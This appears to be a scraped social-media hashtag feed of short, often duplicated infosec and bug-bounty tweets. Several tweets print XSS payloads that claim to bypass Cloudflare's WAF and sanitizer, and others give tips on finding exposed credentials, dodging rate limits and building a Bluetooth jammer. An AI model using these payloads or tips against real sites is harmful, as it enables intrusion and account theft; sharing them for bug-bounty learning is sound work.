Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

Who made this lol #cybersecurity #infosec

payloadartist's tweet image. Who made this lol

#cybersecurity #infosec

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

The 12 Pillars of Cyber Security! 🛡️ Know your defense: from Encryption to API Security. Are you covering all 12? #CyberSecurity #InfoSec #SecurityFramework #digitalearn #DevOps

DIGITALEARN_1's tweet image. The 12 Pillars of Cyber Security! 🛡️ Know your defense: from Encryption to API Security. Are you covering all 12?

#CyberSecurity #InfoSec #SecurityFramework #digitalearn #DevOps

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

China isn't just hacking for data, they're embedding in our infrastructure for a crisis. ⚠️ Targets: Water, power, transit 🤫 Method: Steal logins, lay dormant 💥 Goal: Leverage in a conflict cbsnews.com/news/how-china… #cybersecurity #China #infosec


🛠️ + 🧠 = 🔒 Meet Bradin Rohde (USU). In “Gears, Grit, and Gaps” he flips engineering problem-solving into a toolkit for security pros and hobbyists alike. Catch Bradin at #BSidesRedRocksbsidesredrocks.org #InfoSec #CTF

BsidesSLC's tweet image. 🛠️ + 🧠 = 🔒 Meet Bradin Rohde (USU). In “Gears, Grit, and Gaps” he flips engineering problem-solving into a toolkit for security pros and hobbyists alike. Catch Bradin at #BSidesRedRocks ➜ bsidesredrocks.org
 #InfoSec #CTF

🚨 #phishing report issued 🚨 🌐 Suspected URL: http://v4-defi-av[.]app 🔎 Analysis: urlscan.io/result/0199dad… 🔒 #InfoSec 🛡️ @CloudflareHelp @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: http://v4-defi-av[.]app
🔎 Analysis: urlscan.io/result/0199dad…

🔒 #InfoSec
🛡️ @CloudflareHelp @Phish_Destroy

🔇📡 Noise at 3am? 😅 Build a Bluetooth jammer (research only)🛠️ Step-by-step: ESP32 + NRF24L01. Full post (in Spanish): stuxboynets-organization.gitbook.io/jammer-bluetoo… #InfoSec #CyberSecurity #Seguridad #Ciberseguridad #Bluetooth #RF #Wireless #IoT #Electrónica #hackingtools #hackers #RedTeaming

stuxboynet's tweet image. 🔇📡 Noise at 3am? 😅
Build a Bluetooth jammer (research only)🛠️
Step-by-step: ESP32 + NRF24L01. 
Full post (in Spanish): 
stuxboynets-organization.gitbook.io/jammer-bluetoo…

#InfoSec #CyberSecurity #Seguridad #Ciberseguridad #Bluetooth #RF #Wireless #IoT #Electrónica #hackingtools #hackers #RedTeaming

🚨 #phishing report issued 🚨 🌐 Suspected URL: http://qa[.]identifications-coinbase[.]com 🔎 Analysis: urlscan.io/result/0199dad… 🔒 #InfoSec 🛡️ @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: http://qa[.]identifications-coinbase[.]com
🔎 Analysis: urlscan.io/result/0199dad…

🔒 #InfoSec
🛡️ @Phish_Destroy

🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners PDF: 0xinfection.github.io/reversing/reve… author: @0xInfection #infosec #reverseengineering

mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering
mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering

Valve Anti-Cheat (VAC) reverse engineering codeneverdies.github.io/posts/gh-2/ #infosec

0xor0ne's tweet image. Valve Anti-Cheat (VAC) reverse engineering

codeneverdies.github.io/posts/gh-2/

#infosec

♾ Reverse Engineering 101: Android App Reverse Engineering Guide Guide: ragingrock.com/AndroidAppRE/ author: @maddiestone #infosec #reverseengineering

mqst_'s tweet image. ♾ Reverse Engineering 101: Android App Reverse Engineering Guide

Guide: ragingrock.com/AndroidAppRE/

author: @maddiestone

#infosec #reverseengineering
mqst_'s tweet image. ♾ Reverse Engineering 101: Android App Reverse Engineering Guide

Guide: ragingrock.com/AndroidAppRE/

author: @maddiestone

#infosec #reverseengineering

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

Who made this lol #cybersecurity #infosec

payloadartist's tweet image. Who made this lol

#cybersecurity #infosec

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

[Blog] my journey as a @Microsoft Security Researcher! 🚀 Tips, learnings & insights for anyone aspiring to land their dream role in cybersecurity. 🔗 shreyapohekar.com/blogs/landing-… #Microsoft #Infosec #FreshersInTech #SecurityResearch #security

shreyapohekar's tweet image. [Blog] my journey as a @Microsoft  Security Researcher! 🚀
Tips, learnings &amp;amp; insights for anyone aspiring to land their dream role in cybersecurity.
🔗 shreyapohekar.com/blogs/landing-…

#Microsoft #Infosec #FreshersInTech #SecurityResearch #security

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

The 12 Pillars of Cyber Security! 🛡️ Know your defense: from Encryption to API Security. Are you covering all 12? #CyberSecurity #InfoSec #SecurityFramework #digitalearn #DevOps

DIGITALEARN_1's tweet image. The 12 Pillars of Cyber Security! 🛡️ Know your defense: from Encryption to API Security. Are you covering all 12?

#CyberSecurity #InfoSec #SecurityFramework #digitalearn #DevOps

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

Loading...

Something went wrong.


Something went wrong.


United States Trends